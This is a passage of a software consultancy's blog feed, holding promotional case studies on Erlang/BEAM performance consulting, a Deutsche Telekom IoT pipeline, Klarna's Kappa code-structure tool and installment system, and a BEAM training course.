&lt;dt&gt;Project management&lt;/dt&gt;
&lt;dd&gt;We helped the formal project manager with the direction of the project on a higher level.&lt;/dd&gt;
&lt;/dl&gt;
&lt;p&gt;We will try to come back with another blog article about some of the lessons we learned implementing
a block chain from scratch. (Hint: Patricia Merkle Tries are really cool).&lt;/p&gt;
&lt;p&gt;We were not alone in the project so I want to give a big thank you and shout out to the whole team,
you know who you are!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Unleashing the Power of Erlang&#39;s BEAM</title>
    <link href="https://happihacking.com/blog/posts/2023/delta/"/>
    <updated>2023-05-30T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/delta/</id>
    <summary>A case study with Delta Exchange</summary>
    <content type="html">&lt;p&gt;Today I will share some insight from our collaboration with Delta Exchange (aka Delta), a leading
player in the cryptocurrency trading space. At HappiHacking, our team of experts had the privilege
of working closely with Delta Exchange to address their architectural challenges, scale their
system, and provide comprehensive education on the BEAM virtual machine.&lt;/p&gt;
&lt;p&gt;This case study highlights some of the things we do best at HappiHacking. We help our customers to
help themselves. With our experience in software development and specifically from high-performance
BEAM systems, we can quickly pinpoint problems and suggest solutions. It also shows our ability to
share our experience and educate our customers.&lt;/p&gt;
&lt;p&gt;We call this service Rubberducking as a Service™ (RDaaS™).&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/rubberducking.jpg&quot; alt=&quot;A computer and a rubber duck and two people talking.&quot; title=&quot;A computer and a rubber duck and two people talking.&quot; /&gt;
&lt;h3 id=&quot;part-1-architectural-review-and-scalability-challenges&quot; tabindex=&quot;-1&quot;&gt;Part 1: Architectural Review and Scalability Challenges&lt;/h3&gt;
&lt;p&gt;Delta Exchange has been at the forefront, providing a robust platform for matching trades between
buyers and sellers. However, every successful system faces its share of challenges, and Delta
Exchange is no exception. In the world of high-volume cryptocurrency trading, scalability, and
efficient processing are paramount. Delta Exchange approached us with a specific need - to optimize
their application&#39;s performance, enhance distribution across nodes, and identify any architectural
bottlenecks.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/live_auction.jpg&quot; alt=&quot;An auction interface.&quot; title=&quot;An auction interface.&quot; /&gt;
&lt;p&gt;We meticulously reviewed their existing architecture, considering the nuances of the BEAM scheduler,
and identified areas for improvement. From optimizing process distribution and supervisor structures
to investigating run queue size fluctuations, we left no stone unturned in our pursuit of
architectural excellence.&lt;/p&gt;
&lt;h4&gt;The RabbitMQ Conundrum:&lt;/h4&gt;
&lt;p&gt;During our work, Delta encountered a problem with RabbitMQ overloading Mnesia (Erlang&#39;s built-in
database). This raised concerns and prompted the need to understand the issue in depth to prevent it
from happening again. To investigate the problem, HappiHacking engaged in a detailed analysis of the
RabbitMQ architecture. It was revealed that the size of certain RabbitMQ files indicated
considerable activity in the corresponding tables. While the Mnesia warning was deemed harmless, the
sheer number of queues raised eyebrows and pointed to potential architectural considerations.&lt;/p&gt;
&lt;h4&gt;Optimizations and Learnings:&lt;/h4&gt;
&lt;p&gt;The team at Delta Exchange delved into optimizing their system to address the challenges they
encountered. They identified areas for improvement, such as reducing redundant data in inter-process
communication and migrating away from Mnesia to alternative data storage solutions like ETS and
Redis. These optimizations not only enhanced system efficiency but also paved the way for a more
streamlined and scalable architecture.&lt;/p&gt;
&lt;h4&gt;Unraveling the GenServer Timeouts&lt;/h4&gt;
&lt;p&gt;We also discovered some problems with GenServer call timeouts. With GenServer processes timing out
during handle calls, it became apparent that congestion was a likely culprit. Tobias recommended
examining network throughput and monitoring bursts in Erlang processes and message queues to
identify the point of origin. Additionally, increasing the distribution buffer busy limit and
investigating network-level congestion were suggested as potential solutions.&lt;/p&gt;
&lt;h4&gt;Tools for Monitoring and Postmortem Analysis:&lt;/h4&gt;
&lt;p&gt;Delta also sought advice on monitoring tools to aid in tracking bursts in Erlang processes and
message queues. Tobias highlighted the importance of having systems in place to report such events
and examine them postmortem. While interactive monitoring through tools like the Observer CLI and
sorting processes based on reductions and message queues can be helpful, it&#39;s advantageous to have a
comprehensive monitoring infrastructure to gain deeper insights into system behavior.&lt;/p&gt;
&lt;p&gt;We have continued to develop this course, you can read more about it in the post &lt;a href=&quot;https://happihacking.com/blog/posts/2023/course_on_beam/&quot;&gt; Unlocking Performance: Introducing HappiHacking&#39;s New
Course on BEAM&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id=&quot;part-2-harnessing-the-power-of-beam-vm&quot; tabindex=&quot;-1&quot;&gt;Part 2: Harnessing the Power of BEAM VM&lt;/h3&gt;
&lt;p&gt;To empower Delta Exchange&#39;s team with in-depth knowledge, we designed a series of comprehensive BEAM
VM courses. Our experienced instructors educated Delta Exchange personnel on the inner workings of
the BEAM virtual machine, covering critical topics such as processes, memory subsystems, networking,
debugging, and more. Through engaging lectures, hands-on exercises, and ongoing support, we equipped
Delta Exchange&#39;s team with the tools and insights needed to harness the full potential of BEAM.&lt;/p&gt;
&lt;h3 id=&quot;outcomes-and-achievements&quot; tabindex=&quot;-1&quot;&gt;Outcomes and Achievements:&lt;/h3&gt;
&lt;p&gt;Delta Exchange&#39;s experience with scaling challenges and production insights demonstrates their
commitment to providing a high-performance trading platform.&lt;/p&gt;
&lt;p&gt;Thanks to our collaborative efforts, Delta Exchange experienced significant improvements in its
system&#39;s performance, scalability, and overall architecture. The architectural review led to the
implementation of optimized process distribution, enhanced supervisor structures, and proactive
measures to mitigate run queue size issues. Additionally, the BEAM VM education equipped Delta
Exchange&#39;s personnel with a deep understanding of the virtual machine, empowering them to make
informed decisions and drive continuous improvement.&lt;/p&gt;
&lt;p&gt;One notable optimization was the reduction of redundant data in inter-process communication. By
carefully optimizing payloads and leveraging technologies like &#39;protobuf&#39;, Delta Exchange
significantly reduced payload sizes, resulting in enhanced efficiency and improved overall system
performance.&lt;/p&gt;
&lt;p&gt;Additionally, Delta Exchange made a strategic decision to migrate away from Mnesia and embrace
alternative data storage solutions like ETS and Redis. This shift not only provided them with more
flexibility but also allowed them to leverage the unique capabilities of these technologies for
their specific use cases.&lt;/p&gt;
&lt;p&gt;Their commitment to continuous improvement and willingness to explore new technologies sets them
apart in the fast-paced world of cryptocurrency trading.&lt;/p&gt;
&lt;p&gt;As Delta Exchange continues to push the boundaries of cryptocurrency trading, they stand ready to
face future challenges armed with knowledge and experience. The lessons learned from their RabbitMQ
adventures serve as a reminder that continuous optimization and monitoring are essential components
of building and maintaining a robust and scalable system.&lt;/p&gt;
&lt;p&gt;We&#39;re proud to have played a pivotal role in helping Delta Exchange tackle its scalability
challenges and unlock the true power of the BEAM virtual machine. Our collaboration stands as a
testament to the transformative impact of architectural review, scalability solutions, and
comprehensive education.&lt;/p&gt;
&lt;p&gt;Are you ready to unleash the full potential of your software system? Contact HappiHacking today and
enjoy a world of optimized performance, scalable architecture, and unrivaled expertise.&lt;/p&gt;
&lt;p&gt;For the technical foundations behind the BEAM scheduler, process memory,
and monitoring tools discussed in this case study, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Rapid Prototyping</title>
    <link href="https://happihacking.com/blog/posts/2023/iot_pipeline/"/>
    <updated>2023-05-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/iot_pipeline/</id>
    <summary>Building a production ready MVP in 3 months</summary>
    <content type="html">&lt;p&gt;Today, we want to talk about on of our exciting projects with Deutsche Telekom, one of Europe&#39;s largest telecom providers. Together, we embarked on a mission to revolutionize the Smart Home industry, all while adhering to GDPR and ensuring scalable, data-driven innovation. This is yet another testimony of the success of the Happy Path Method&lt;sup&gt;TM&lt;/sup&gt;.&lt;/p&gt;
&lt;img class=&quot;img-blog &quot; src=&quot;https://happihacking.com/images/iot_and_taba.jpg&quot; alt=&quot;The team with the IoT pipeline on a whiteboard in the background.&quot; title=&quot;The team with the IoT pipeline on a whiteboard in the background.&quot; /&gt;
&lt;p&gt;Telekom, as they prefer to call themselves, needed a system that could seamlessly handle a staggering one billion transactions per day, all while tackling the complexities of data anonymization. But here&#39;s the twist: they still wanted to extract valuable insights through statistical analysis from this anonymized data. Challenge accepted!&lt;/p&gt;
&lt;p&gt;We got the request in late December from an innovation department at Telekom. They needed to convince
upper management that it was possible to build a system that could handle this amount of traffic within
a reasonable budget. Problem was, that this proof was needed by January to be approved in the next year&#39;s
budget.&lt;/p&gt;
&lt;p&gt;In just three short weeks our HappiHacking team armed with Erlang, Kafka, and the Happy Path Method quickly built a proof-of-concept solution that easily could handle over 15.000 transactions per second, and anonymizing all data in a GDPR compliant way. This convinced Deutsche Telekom&#39;s management of the project&#39;s feasibility. With a bit of Swedish humor and a relentless pursuit of value delivery, we showed that innovation doesn&#39;t have to be a long and tedious process.&lt;/p&gt;
&lt;p&gt;Unfortunately there was a political policy decision at Telekom at the time that only allowed the use of three programming languages in production. Erlang was strangely not one of them, but Java was. So over the next three months, we worked tirelessly to transform our Erlang proof-of-concept into a production-ready solution in Java.
It still used the same Kafka setup, anonymization and Grafana monitoring but some of the end points were replaced by Java, and the corporately approved Spring Boot framework. This required a bit more work but HappiHacking&#39;s team of experts designed an architecture that could handle the massive data volume, ensuring smooth transactional systems capable of handling billions of messages each day.&lt;/p&gt;
&lt;p&gt;This innovative data streaming solution paved the way for Deutsche Telekom&#39;s own team to build new services upon our foundation. Among those services was the &lt;a href=&quot;https://www.red-dot.org/project/magentazuhause-app-60924&quot;&gt;MagentaZuhause App&lt;/a&gt; which received a reddot award.&lt;/p&gt;
&lt;p&gt;As a little side project we also managed to get data from a Magenta TV set top box which was a black box to us. By combining bash scripts, C, regexps and some innovative hacking we manged to get information from the TV, and
we could also turn the TV on and off remotely within a few milliseconds. This proved that we could build a service for remotely managing a TV in the home. For a real product we would of course build it into the software which another department within Telekom had access to, but such a cross departments project could take months to get started.&lt;/p&gt;
&lt;p&gt;&amp;quot; - Why did the smart TV get turned off?&amp;quot; &lt;br /&gt;
&amp;quot; - Happi&#39;s joke was so bad.&amp;quot;&lt;/p&gt;
&lt;p&gt;Throughout the project, our partnership with Deutsche Telekom flourished. Together, we navigated the intricacies of the Smart Home landscape, crafting solutions that blended robust data handling with GDPR compliance. Our motivated HappiHacking team went the extra mile, delivering qualitative results while sharing a few bad jokes along the way.&lt;/p&gt;
&lt;p&gt;In the words of Filiz Hazer-Yilmaz, Deutsche Telekom&#39;s representative: &amp;quot;If you are searching for a motivated team that will go the last mile with you, deliver qualitative stuff, and understand bad jokes…HappiHacking is the right choice!&amp;quot;&lt;/p&gt;
&lt;p&gt;At HappiHacking, we thrive on challenging projects that push the boundaries of innovation. Our Smart Home collaboration with Deutsche Telekom exemplifies the power of rapid prototyping, scalable systems, and a touch of Swedish irreverence. We&#39;re proud to have played a part in designing and implementing new IoT services, revolutionizing the Smart Home experience for Deutsche Telekom&#39;s customers.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Taming the Spaghetti Monster: The Birth of Kappa</title>
    <link href="https://happihacking.com/blog/posts/2023/kappa/"/>
    <updated>2023-05-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/kappa/</id>
    <summary>Solving Codebase Complexity at Klarna with a Business Layers Strategy</summary>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/spaghetti.jpg&quot; alt=&quot;A plate of spaghetti and layers of Burrata and bacon&quot; title=&quot;A plate of spaghetti and layers of Burrata and bacon&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;In the early days at Klarna (a period I covered in &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;), as our codebase grew exponentially, a peculiar problem began to manifest. Our expansive Erlang code base, like an unruly hydra, developed a tendency to morph into a maze of spaghetti code. The issue? Erlang functions, being either local to a module or exported universally, had a propensity for bypassing the carefully laid out APIs of our subsystems. As a result, library functions across subsystems could directly communicate, ignoring the module divisions that were supposed to enforce a clean code structure. It was a classic case of an organizational nightmare - the spaghetti monster was upon us.&lt;/p&gt;
&lt;p&gt;Faced with this challenge, my colleagues, Richard and Tobias, and I, knew we had to act swiftly. We devised a plan that involved introducing business layers, coupled with enforcing rules through the build system to thwart any such infractions. This strategy was designed to control how different parts of the codebase could interact with each other. The result was the creation of an internal system that we affectionately named &amp;quot;Kappa&amp;quot;.&lt;/p&gt;
&lt;p&gt;Kappa was designed to answer the call for efficient means to manage the increasing complexity in our codebase. With Kappa, we were able to trace the ownership of specific applications, modules, or even database tables. It gave us an eagle-eye view of our codebase, pointing out which team was responsible for what part of the code and how to contact them. This made our development process significantly more organized and facilitated a higher level of accountability.&lt;/p&gt;
&lt;p&gt;Further, Kappa allowed us to establish &#39;Application API modules&#39; to curb inter-application calls to a select API set, preventing calls to private modules of other apps. The &#39;Restricted record fields usage&#39; made alterations to record structures easier by only allowing specified modules to access specific record fields directly. We also introduced &#39;Code Layers&#39;, which essentially divided our apps into multiple layers, each with specific roles and restrictions concerning inter-layer communication.&lt;/p&gt;
&lt;p&gt;The effects of implementing Kappa were almost immediate - we saw a significant improvement in code modularity, traceability, and the overall quality of our codebase. The spaghetti monster was finally tamed!&lt;/p&gt;
&lt;p&gt;What started as a small internal project to tackle a growing concern transformed into a powerful tool that enabled us to navigate a complex codebase and bring it under control. Today, part of Kappa&#39;s code has been open-sourced, offering a glimpse into the structures we used to control our code at Klarna.&lt;/p&gt;
&lt;p&gt;The creation and implementation of Kappa serve as a testament to HappiHacking&#39;s dedication to finding effective solutions in the realm of software development. Our battle with the spaghetti monster has given us a deeper understanding of the nuances involved in managing a large codebase. Armed with this knowledge and experience, we at HappiHacking are committed to helping you navigate the complexities of your codebase and deliver value as efficiently as possible.&lt;/p&gt;
&lt;p&gt;You can find Kappa &lt;a href=&quot;https://github.com/klarna-incubator/kappa&quot;&gt;on Github&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The &#39;Happy Path Method&#39;™ - Reshaping Software Development with Agile Excellence</title>
    <link href="https://happihacking.com/blog/posts/2023/the_happy_path/"/>
    <updated>2023-05-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/the_happy_path/</id>
    <summary>Maximizing Value, Minimizing Time: The HappiHacking Way</summary>
    <content type="html">&lt;p&gt;In software development, time often surpasses money as the most valuable resource. Projects that are delayed or become stagnant incur more costs than those executed swiftly and efficiently. Also, the faster the value of a project can be reaped the faster the project start paying for itself.&lt;/p&gt;
&lt;p&gt;With this realization at the forefront, we at HappiHacking have developed a unique approach to software development: the &#39;Happy Path Method&#39;™. This revolutionary method, inspired by the &amp;quot;let it crash&amp;quot; thinking inherent in Erlang programming and our philosophy that &amp;quot;time is greater than money,&amp;quot; is setting a new benchmark in the agile software development realm.&lt;/p&gt;
&lt;p&gt;The &#39;Happy Path Method&#39;™ focuses on value delivery, aiming to extract and deliver the utmost value from a project as swiftly as possible. It’s not merely about creating code, but about crafting intelligent, efficient solutions that align with your strategic goals. Our method puts the most impactful tasks front and center, ensuring that the most value is obtained upfront, accelerating the return on investment.&lt;/p&gt;
&lt;p&gt;A significant influence on our approach is the Erlang programming language, renowned for its robust, fault-tolerant systems and concurrency. The &amp;quot;let it crash&amp;quot; philosophy of Erlang encourages the creation of systems that recover quickly from failures rather than attempting to prevent all possible errors - a philosophy we’ve carried into the &#39;Happy Path Method&#39;™. We focus on building the core, essential functionality first (the &amp;quot;happy path&amp;quot;), while allowing for the fact that there may be bumps and obstacles along the way. This approach enables us to deliver software that&#39;s robust and adaptable, offering high value while mitigating risks.&lt;/p&gt;
&lt;p&gt;The &#39;Happy Path Method&#39;™ does not cut corners or compromise on quality. On the contrary, it emphasizes the importance of delivering a high-quality, working product with the most crucial features first, thus ensuring a more efficient and productive use of time and resources. It allows us to incrementally refine and enhance the product, resulting in a mature, robust solution that meets all requirements while exceeding expectations.&lt;/p&gt;
&lt;p&gt;Implementing the &#39;Happy Path Method&#39;™, we&#39;ve helped numerous clients achieve their goals faster and more effectively than they ever imagined possible. For instance, our work with &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna&#39;s installment plans project&lt;/a&gt; is a testament to the power of the &#39;Happy Path Method&#39;™, where we transformed a grand vision into an operative reality within an impressively short timeframe, all while ensuring meticulous regulatory compliance and precision.&lt;/p&gt;
&lt;p&gt;The &#39;Happy Path Method&#39;™ is more than just a technique; it&#39;s a philosophy of prioritizing value over the ticking clock, of understanding that time is, indeed, greater than money. It encapsulates the ethos of HappiHacking - delivering high-quality, efficient solutions that truly make a difference. We invite you to experience the difference of the &#39;Happy Path Method&#39;™. After all, the path to happiness is paved with successful software deployments!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>HappiHacking&#39;s Just in Time Development</title>
    <link href="https://happihacking.com/blog/posts/2023/Installment_plans/"/>
    <updated>2023-05-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/Installment_plans/</id>
    <summary>An Agile Success Story with Klarna&#39;s Installment Plans</summary>
    <content type="html">&lt;p&gt;I served as the Head of Engineering in Klarna&#39;s early days. With a lean yet proficient team of five, we managed to manifest the vision of Klarna&#39;s flexible installment plans through rapid prototyping - setting a new precedent in agile development.&lt;/p&gt;
&lt;p&gt;Klarna had a mission: to let customers choose flexible payment installments. Translating this vision into reality required far more than a great idea. It demanded exceptional expertise, agile efficiency, and a profound comprehension of local rules and legislation.&lt;/p&gt;
&lt;p&gt;Our project was about speed, yes, but it was also about careful compliance and precision. Harnessing our unique agile development approach, &lt;a href=&quot;https://happihacking.com/blog/posts/2023/the_happy_path/&quot;&gt;the Happy Path Method&lt;/a&gt;, we were tasked with creating a system that met Klarna&#39;s specific requirements, complied with local regulations, and was delivered within an impressively short time. We started by thoroughly analyzing the proposed solution, then concentrated our efforts on delivering value swiftly and effectively.&lt;/p&gt;
&lt;p&gt;In August, the project embarked, aiming to be ready for the Christmas shopping rush. We adopted incremental releases as a strategic tool to ensure continuous progress and timely delivery - an approach that epitomizes the potency of agile methodologies. This enabled us to gather regular feedback, make necessary adjustments, and adapt to ensure the final product perfectly suited Klarna&#39;s needs.&lt;/p&gt;
&lt;p&gt;By October, just two months after the project kick-off, the first iteration of the installment plan system was launched. This was more than a major milestone; it was a demonstration of our formidable development skills and dedication to delivering within the deadline. This early release enabled webshops to begin offering installment plans as a payment method, even though invoicing end customers, receiving payments, or calculating interest were not yet functional. However, by fully understanding the service, we knew these components wouldn&#39;t be required until one month after the first customer purchase - leaving ample time for further development.&lt;/p&gt;
&lt;p&gt;Post initial release, we relentlessly refined and enhanced the system, adding features just in time. Our efforts ranged from introducing invoicing and handling payments to calculating interest, all the while optimizing the system for performance, security, and usability.&lt;/p&gt;
&lt;p&gt;By February, a short six months since project initiation, the system was not only live but also a dominant player in the Swedish market. This remarkable growth, both rapid and robust, underscores the effectiveness of our implementation strategy and the intrinsic value of the installment plan solution.&lt;/p&gt;
&lt;p&gt;Our journey with Klarna&#39;s installment plan system is more than an agile success story. It&#39;s a testament to the power of understanding client needs, delivering rapid yet reliable solutions, and maintaining meticulous regulatory compliance in the FinTech industry. It&#39;s a reflection of HappiHacking&#39;s philosophy: to create high-quality, efficient solutions that make a genuine impact.&lt;/p&gt;
&lt;p&gt;Through our unique blend of speed, precision, and agility, HappiHacking is constantly pushing the boundaries of what&#39;s possible in software development.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Unlocking Performance: Introducing HappiHacking&#39;s New Course on BEAM</title>
    <link href="https://happihacking.com/blog/posts/2023/course_on_beam/"/>
    <updated>2023-05-23T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/course_on_beam/</id>
    <content type="html">&lt;p&gt;We&#39;re thrilled to announce our latest offering: an in-depth course dedicated to understanding and optimizing performance in BEAM, the virtual machine that powers Erlang and Elixir programming languages.&lt;/p&gt;
&lt;p&gt;Our course offers you the tools and knowledge to truly harness the power of BEAM, with a curriculum covering essential topics such as:&lt;/p&gt;
&lt;p&gt;Thinking in Processes: BEAM&#39;s unique strength lies in its process-oriented design, offering massive scalability and robust error handling. This course segment demystifies concurrent programming, guiding learners to think in processes, a foundational shift that can supercharge your coding efficiency.&lt;/p&gt;
&lt;p&gt;Memory &amp;amp; Garbage Collection (GC): Master the nuances of memory management within the BEAM environment. We&#39;ll dive deep into the inner workings of BEAM&#39;s real-time garbage collection, a crucial knowledge area for writing efficient, high-performance code.&lt;/p&gt;
&lt;p&gt;Data and Scheduling: Learn the art of data management and scheduling in BEAM&#39;s concurrent system. This section explains how BEAM schedules processes and manages data, ensuring smooth operation even under heavy loads.&lt;/p&gt;
&lt;p&gt;IO: This module explores input/output operations, often the bottleneck in application performance. We&#39;ll take a granular look at BEAM&#39;s approach to IO, providing practical strategies for optimization.&lt;/p&gt;
&lt;p&gt;The VM and The Compiler: Get up close with the BEAM Virtual Machine and its compiler. We provide an in-depth exploration of these core components, shedding light on their roles in the overall system performance.&lt;/p&gt;
&lt;p&gt;Operations, Monitoring, and Debugging: To run a successful application in production, one must know how to monitor, debug, and perform various operations efficiently. Our course equips you with these critical skills, turning potential challenges into opportunities for improvement.&lt;/p&gt;
&lt;p&gt;Performance: Finally, we delve into performance optimization. Armed with knowledge from the previous sections, you&#39;ll learn how to fine-tune your BEAM-powered applications for maximum speed and efficiency.&lt;/p&gt;
&lt;p&gt;Whether you&#39;re an experienced developer looking to elevate your BEAM-related projects or a beginner intrigued by the unique possibilities of Erlang and Elixir, this course is a valuable resource.&lt;/p&gt;
&lt;p&gt;Much of the content in the course is based on &lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;, also available for free &lt;a href=&quot;https://blog.stenmans.org/theBeamBook/&quot;&gt;online&lt;/a&gt;. For background on BEAM&#39;s evolution over the decades, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
</feed>
